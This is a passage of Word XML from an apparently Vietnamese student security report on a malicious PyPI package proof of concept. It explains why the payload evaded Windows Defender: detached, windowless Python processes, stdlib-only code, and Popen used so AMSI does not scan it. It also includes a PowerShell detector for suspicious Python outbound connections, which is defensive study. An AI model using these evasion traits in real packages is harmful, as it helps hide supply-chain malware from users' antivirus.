    <w:p w14:paraId="6A477601" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Task Manager chỉ thấy python.exe đang chạy — không có gì bất thường về tên, không có cửa sổ nào xuất hiện. Người dùng không biết có gì đang xảy ra ngầm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286FFD8" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2011E87F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Lý do 5: Signature-based Detection là hàng rào chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11209C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Defender trong cấu hình mặc định chủ yếu dùng signature matching — so sánh hash/pattern với cơ sở dữ liệu. socket + subprocess + urllib là Python stdlib chuẩn, hàng triệu script hợp pháp dùng y chang → không có signature nào khớp → không cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1CDDA9"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0FF200AE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24705FD5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thừa nhận giới hạn về kỹ thuật evasion</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06193424" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>Cần phân biệt rõ: payload này bypass Defender nhờ đặc điểm TỰ NHIÊN của Python script (trusted interpreter, stdlib API, không có binary dropper) — không phải nhờ kỹ thuật evasion CHỦ ĐỘNG như code obfuscation, string encryption, anti-debug, hay sandbox detection. Malware supply chain thực tế (XZ Utils, SolarWinds) có thêm các lớp obfuscation phức tạp hơn nhiều. Phạm vi của PoC này tập trung vào cơ chế supply chain trigger, không phải evasion nâng cao.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5210BE25" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675B6E5A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc227470579"/>
      <w:r>
        <w:t>B.2 — Tổng hợp kỹ thuật evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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00"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D4D10" w14:paraId="26E35A9C"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39A55587" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kỹ thuật</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16CEE5ED" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cơ chế</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1A576C53" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Loại</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="7BFC8A2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17DDD2" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trusted Process (python.exe)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A5C89C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV tin tưởng interpreter hợp pháp, ít nghi ngờ hành vi mạng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C0DE44F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tự nhiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="18758BEE"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224D0A1B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No binary dropper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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0089851B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Không tạo .exe mới — không trigger file scan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36C40160" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tự nhiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="589650F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85F669" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Module-level execution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E4B08E3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload chạy trong context import pip — bình thường với AV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A0D848" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thiết kế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="14502D2B"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19AD1C07" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DETACHED + NO_WINDOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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2118FB88" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tiến trình ẩn, không UI, thoát khỏi pip</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567652B7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Chủ động</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="476684B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E199AB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No AMSI-hooked API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D1272A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dùng subprocess.Popen thay vì exec()/eval() → AMSI không scan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9D83B45" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thiết kế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="0061D02A"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42FDE7E6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>stdlib thuần (.tar.gz)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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21B63BB9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Không match signature malware, .tar.gz không bị deep-scan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671DE186" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tự nhiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="437B7FBF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E0ADD5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="5" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D79BEBD" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc227470580"/>
      <w:r>
        <w:t>IV. PHẦN C — DETECTOR: CÔNG CỤ PHÁT HIỆN (4.0 điểm)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="129723F7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4B8343" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc227470581"/>
      <w:r>
        <w:t>C.1 — Mục tiêu và thiết kế Detector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2AF77496" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi hoàn tất PoC tấn công, nhóm xây dựng script PowerShell detector.ps1 đặt tại C:\S04Demo. Mục tiêu: giám sát thời gian thực các hành vi bất thường của tiến trình Python — phát hiện kết nối outbound về IP không thuộc whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724070C3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D32D39D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Điểm cải tiến quan trọng so với phiên bản đầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED01BC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Thêm #Requires -RunAsAdministrator — ghi rõ yêu cầu chạy với quyền Admin (Get-NetTCPConnection và Get-CimInstance cần elevated privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6838A7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Whitelist IP: loại trừ 151.101.x.x (PyPI CDN / Fastly), 127.0.0.1, ::1 — tránh false positive khi pip tải package từ PyPI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555230B7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Chống spam cảnh báo: $ReportedConnections lưu các kết nối đã alert, mỗi kết nối chỉ báo một lần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23B259" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Ghi log file ra C:\S04Demo\detector_audit.log với timestamp — có audit trail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DE050" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>System Clear message chỉ in một lần sau khi hết threat — không spam mỗi 3 giây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113510E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Đổi tên biến từ $pid sang $procId — tránh trùng biến hệ thống $PID của PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D194075" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCA8F16" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detector code đầy đủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E01CE1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#Requires -RunAsAdministrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0AE11" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$logFile = "C:\S04Demo\detector_audit.log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2A334" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write-Host "--- S04 ADVANCED BEHAVIORAL DETECTOR IS RUNNING ---" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C0AB5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7553B5AA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Whitelist: PyPI CDN (Fastly 151.101.x.x), localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D3AE3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$WhitelistIPs = @("151.101.", "127.0.0.1", "::1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2478E152" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$ReportedConnections = @()  # Chống spam cảnh báo trùng lặp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68CBDF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$isSystemClear = $false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6215FB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF23492" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>while($true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D79E9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$timestamp = Get-Date -Format "HH:mm:ss"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB6FEE"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$network = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5731C0F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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4DD2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$proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D662DE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$isPython = $proc.ProcessName -match "python"  # Bắt python, python3, pythonw...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC3BAE"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$remoteIP = $_.RemoteAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A5B9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$isWhitelisted = $false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE8F12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foreach ($ip in $WhitelistIPs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78F0BD"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($remoteIP -like "$ip*") { $isWhitelisted = $true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB84EA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22ADA41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return ($isPython -and -not $isWhitelisted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D27A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 catch { return $false }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67F476"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651A19D3"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($network) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D8E0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$isSystemClear = $false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611E0B8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foreach ($conn in $network) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD9009"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$procId = $conn.OwningProcess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157BA07C"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$remote = $conn.RemoteAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C86826"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$connectionKey = "$procId-$remote"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D504F0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($ReportedConnections -notcontains $connectionKey) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF37AA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$proc = Get-Process -Id $procId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B46535"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Write-Host "[$timestamp] ALERT: Suspicious Python Outbound!" -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B5941"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Write-Host "[!] PID: $procId | Path: $($proc.Path) | Remote: $remote" -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BBD28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$ReportedConnections += $connectionKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34885C8F"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"[$timestamp] ALERT: PID $procId -&gt; $remote | $($proc.Path)" | Out-File $logFile -Append</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53B9C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1D0B13B6"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4CFFEFE1"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A25E83"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if (-not $isSystemClear) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D107DEA"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Write-Host "[$timestamp] System Clear: No active threats detected." -ForegroundColor Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB47F0"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$isSystemClear = $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C37211"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$ReportedConnections = @()  # Reset để sẵn sàng cho đợt tấn công mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBD2A2"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7ACC9698"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA4E44" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Start-Sleep -Seconds 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275942B9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266179A4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04845888" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc227470582"/>
      <w:r>
        <w:t>C.2 — Giới hạn của detector và hướng cải tiến</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6445059D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi hoàn thành, nhóm tự đánh giá các điểm yếu còn tồn tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F53851" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">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4D4D10" w14:paraId="7F312669"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487E64ED" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hạn chế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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33F2A859" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Giải thích &amp; Hướng khắc phục</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
